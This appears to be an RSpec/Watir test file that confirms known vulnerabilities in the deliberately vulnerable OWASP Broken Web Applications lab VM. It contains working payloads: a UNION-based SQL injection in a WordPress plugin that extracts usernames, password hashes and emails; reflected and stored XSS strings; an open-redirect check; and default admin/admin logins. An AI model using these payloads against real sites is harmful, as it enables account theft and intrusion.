OWASP Broken Web Applications Application Vulnerability Unit Testing Watir-WebDriver Test

OWASP Broken WebApps RSpec.rb

# encoding: utf-8

#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1

require 'rspec'
require 'watir-webdriver'

$BROKEN_WEB_APPS_HOST='http://owaspbwa'


describe 'OWASP Broken Web App: Wordpress' do
	before(:all) do
		@browser = Watir::Browser.new
	end
	after(:all) do
		@browser.close
	end
	
	context "Without authenticating", :type=>'authorization' do
		specify "I should be able to access the blog" do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/'
			@browser.title.include?('Broken WordPress').should be_true
		end
	
		specify "I should be able to access the login page" do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
			@browser.title.include?('Login').should be_true
		end
		
		specify "I should not be able to access the WordPress Admin page" do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
			@browser.title.include?('Login').should be_true
		end
	end
	
	context "After logging in as 'admin'," do
		before(:all) do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
			@browser.text_field(:name,"log").set("admin")
			@browser.text_field(:name,"pwd").set("admin")
			@browser.button(:name,"submit").click
		end
					
		specify "the page should list 'admin' as the authenticated user" do
			@browser.strong(:text, /admin/i).text.should eq('admin')			
		end
		
		specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do			
				@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
				@browser.title.include?('Dashboard').should be_true			
		end
		
		specify "I should be able to access the User Admin page", :type=>'authorization' do		
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/users.php'
			@browser.title.include?('Users').should be_true
		end
		
		context 'After logging out, visiting the login page, and pressing the down arrow', :type=>'autocomplete' do
			before(:all) do
				@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'				
				@browser.text_field(:name,/log/i).send_keys(:arrow_down)
				@browser.text_field(:name,/log/i).send_keys(:arrow_down)
				@browser.text_field(:name,/log/i).send_keys(:return)
			end
			
			specify "I shold see autocompleted usernames" do			
				@browser.text_field(:name,/log/i).value.should_not be_nil
				@browser.text_field(:name,/log/i).value.should_not eq('')
				@browser.text_field(:name,/log/i).value.length > 0
			end
		end		
	end
	
	context "After logging in as 'user'," do
		before(:all) do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
			@browser.text_field(:name,"log").set("user")
			@browser.text_field(:name,"pwd").set("user")
			@browser.button(:name,"submit").click
		end
					
		specify "the page should list 'user' as the authenticated user" do
			@browser.strong(:text, /user/i).text.should eq('user')			
		end
		
		specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do			
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
			@browser.title.include?('Dashboard').should be_true			
		end
		
		specify "I should be not able to access the User Admin page", :type=>'authorization' do		
			@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/users.php'
			@browser.html.include?('You do not have sufficient permissions to access this page.').should be_true
		end
	end
	
	
	context 'On the ss_load.php page,', :type=>'sqli' do
		context 'When I enter a single quote into the ss_id URL parameter,' do
			before(:all) do
				@browser.goto $BROKEN_WEB_APPS_HOST+"/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
			end
			specify 'The application should respond with an SQL error message' do
				@browser.html.include?("You have an error in your SQL syntax").should be_true
			end
		end
		context 'When I enter an SQL Injection Payload,' do
			before(:all) do
				@browser.goto $BROKEN_WEB_APPS_HOST+%q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
			end
			specify "I should see the 'admin' account details" do
				@browser.div(:id,'s1_spreadsheetBars').text.include?('[email protected]').should be_true
			end
		end
	end
end

describe 'OWASP Broken Web App: AWStats' do
	before(:all) do
		@browser = Watir::Browser.new
	end
	
	after(:all) do
		@browser.close
	end
	
	context "When entering an XSS payload into the 'editList.php' page, ",:type=>'xss' do
		before(:all) do
			@browser.goto $BROKEN_WEB_APPS_HOST+%q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
		end
		specify 'An alert box should be displayed' do
			expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
		end
	end
	
	context "When entering an XSS payload into the 'newChecklist.php' page", :type=>'stored_xss' do
		before(:all) do
			@browser.goto $BROKEN_WEB_APPS_HOST+'/gtd-php/newChecklist.php'
			@browser.text_field(:name,'title').set %q|"><script>alert(1)</script>|
			@browser.text_field(:name,'description').set 'asdf'
			@browser.button(:name,'submit').click
		end
		specify 'I should see an alert box after submitting the form' do
			expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
		end
		context "When visiting the 'listChecklist.php' page, " do
			specify 'I should see an alert box' do
				expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
			end
		end
	end	
	
	context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type=>'open_redirect' do
		before(:all) { @browser.goto ($BROKEN_WEB_APPS_HOST+'/awstats/awredir.pl?url=google.com') }
		specify "The browser should be redirected to 'google.com'" do
			@browser.title.should eq('Google')
		end		
	end
end